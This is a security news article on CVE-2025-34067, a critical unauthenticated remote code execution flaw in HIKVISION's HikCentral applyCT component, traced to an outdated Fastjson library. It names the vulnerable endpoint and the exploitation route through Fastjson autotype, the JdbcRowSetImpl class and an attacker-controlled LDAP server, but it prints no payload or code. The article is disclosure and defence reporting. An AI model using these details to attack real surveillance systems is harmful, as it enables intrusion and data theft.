A critical vulnerability in HIKVISION’s applyCT security management platform that could allow attackers to execute arbitrary code on affected systems without authentication.
The vulnerability, designated CVE-2025-34067, has been assigned the maximum CVSS score of 10.0, indicating its severe impact on enterprise security infrastructure.
The vulnerability affects HIKVISION’s HikCentral platform, formerly known as the Integrated Security Management Platform, which serves as a comprehensive security management solution widely deployed across government, commercial, and industrial sectors.
The applyCT component, designed to provide centralized interface management for security devices, contains a critical security vulnerability that enables unauthenticated remote command execution.
Published on July 2, 2025, the vulnerability has been classified with multiple Common Weakness Enumeration (CWE) identifiers, including CWE-502 for deserialization of untrusted data and CWE-917 for improper neutralization of special elements used in expression language statements.
The severity of this vulnerability stems from its potential to provide attackers with complete system control without requiring prior authentication or user interaction.
The affected platform’s widespread adoption across diverse sectors amplifies the security concern.
Organizations utilizing HIKVISION’s security infrastructure for surveillance and monitoring operations face immediate exposure to potential compromise.
The platform’s scalability, which allows deployment in both small-scale and large-scale surveillance environments, means that numerous installations could be vulnerable to exploitation.
HIKVISION applyCT Vulnerability
The vulnerability’s root cause lies in the platform’s use of an outdated version of the Fastjson library for processing JSON data.
Attackers can exploit this weakness by crafting malicious JSON payloads targeting the /bic/ssoService/v1/applyCT endpoint through POST requests with appropriate content-type headers.
The exploitation mechanism involves manipulating the Fastjson library’s auto-type feature to load arbitrary Java classes.
Specifically, attackers can reference the JdbcRowSetImpl class to establish connections with malicious LDAP servers.
By crafting payloads that manipulate the datasource parameter to point to untrusted LDAP servers, attackers can trigger the deserialization of malicious objects, ultimately achieving remote code execution.
The attack vector leverages insufficient input validation within the applyCT component. When the platform processes the malformed JSON payload, it fails to properly sanitize user input, allowing the Fastjson library to instantiate dangerous classes that can execute arbitrary code on the underlying system.
This bypass of security controls enables attackers to load and execute unauthorized code through the LDAP protocol.
Security Infrastructure
The consequences of successful exploitation extend far beyond individual system compromise.
According to Report, HIKVISION applyCT platforms can access sensitive surveillance data, manipulate security configurations, and potentially use compromised systems as launching points for broader network attacks.
Organizations face multiple risk vectors including unauthorized data access, complete system manipulation, and potential service disruption.
The vulnerability’s critical nature means that successful exploitation could result in significant financial losses, reputational damage, and legal liabilities for affected organizations.
Furthermore, compromised security management platforms could facilitate additional attacks within enterprise networks, creating cascading security failures.
The publication of this vulnerability with a “known-exploited-vulnerability” tag indicates that threat actors are actively targeting this vulnerability.
Security teams managing HIKVISION applyCT deployments should prioritize immediate assessment and remediation efforts to prevent unauthorized access and protect critical surveillance infrastructure from potential compromise.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.
.webp?w=356&resize=356,220&ssl=1 "Microsoft Teams Blocking Users from Accessing Embedded Office Documents")
